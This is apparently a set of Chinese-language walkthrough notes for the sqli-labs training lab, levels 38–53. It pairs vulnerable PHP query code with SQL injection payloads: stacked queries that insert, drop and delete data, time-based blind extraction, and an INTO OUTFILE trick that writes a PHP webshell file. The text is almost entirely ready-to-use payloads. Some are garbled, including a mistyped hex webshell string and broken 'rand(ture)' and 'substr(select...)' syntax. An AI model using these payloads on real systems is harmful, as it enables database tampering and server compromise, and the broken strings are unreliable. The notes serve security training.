less-38
源码:$sql="select * from users where id='$id' limit 0,1";
注入:?id=1';insert into users (id,username,password) values(12,'jack','jacl')--+
less-39
源码:$sql="select * from users where id=$id limit 0,1";
注入:?id=1;insert into users (id,username,password) values(12,'jack','jacl')--+
less-40
源码:$sql="select * from users where id=('$id') limit 0,1";
注入:?id=1');insert into users (id,username,password) values(12,'jack','jacl')--+
less-41:
和less-40一样,盲注
注入:?id=1;insert into users (id,username,password) values(13,'jack','jack')%23
less-42:
源码login.php:
$username=mysqli_real_escape_string($conl, $_POST['login_user']);
$password=$_POST["login_password"]; //password没有被过滤
$sql="select * from users where username='$username' and password='$password'";
注入:a';create table class like users#
less-43:
源码login.php:
漏洞同上,区别在于:$sql="select * from users where username=('$username') and password=('$password')";
注入:a');drop table class#
less-44:
没有任何报错信息,采用盲注
漏洞同less-42
注入:a';insert into class (id,username,password) values('11','jack','jack')#
less-45:
没有任何报错信息,采用盲注
漏洞同less-43
注入:a');delete from class where id=11#
less-46:
源码:$sql="select * from users order by $id";
尝试?sort=1 desc和?sort=1 asc, 显示结果不同,则表明可以注入,?sort=rand(ture)和?sort=rand(false)的结果也不一样
1.报错注入:?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()), 0x3a,0x3a,floor(rand()*2)) limit 0,1)
2.延时注入:?sort=1 and if(ascii(substr(database(),1,1))=118,0,sleep(5))
3.添加注入语句
procedure analyse参数注入:?sort=1 procedure analyse(extractvalue(rand()*2, concat(0x3a,version())),1)
into outfile参数注入:?sort=1 into outfile "c:/data.txt"
less-47:
源码:$sql="select * from users order by '$id'"; //将数字型变成了字符型
1.and rand相结合
2.导入导出文件into outfile参数
?sort=1' into outfile "c:/data.txt"--+
利用lines terminated by上传木马
?sort=1' into outfile "c:/..../data.php" lines terminated by Ox3c3f604947501d3979--+(木马<? php phpinfo();?>进行16进制转换)
less-48:
与less-46的区别在于没有报错信息,盲注
?sort=(if(ascii(substr(database(),1,1))=116,0,sleep(5)))
less-49:
与less-47的区别在于没有报错信息,盲注
?sort=1' and (if(ascii(substr(select username from users limit 0,1),1,1))=69,0,sleep(1)))--+
less-50
源码:$sql="select * from users order by $id";
if (mysqli_multi_query($con1,$sql)) //mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句
注入:?sort=1;create table jack like users#
less-51
源码:$sql="select * from users order by '$id'";
注入:?sort=1';drop table jack--+
less-52
同less-50,不过没有报错信息
注入:?sort=1;insert into users (id,username,password) values('16','jack','jack')--+
less-53
同less-51,不过没有报错信息,盲注
注入:?sort=1';delete from jack where id=16;--+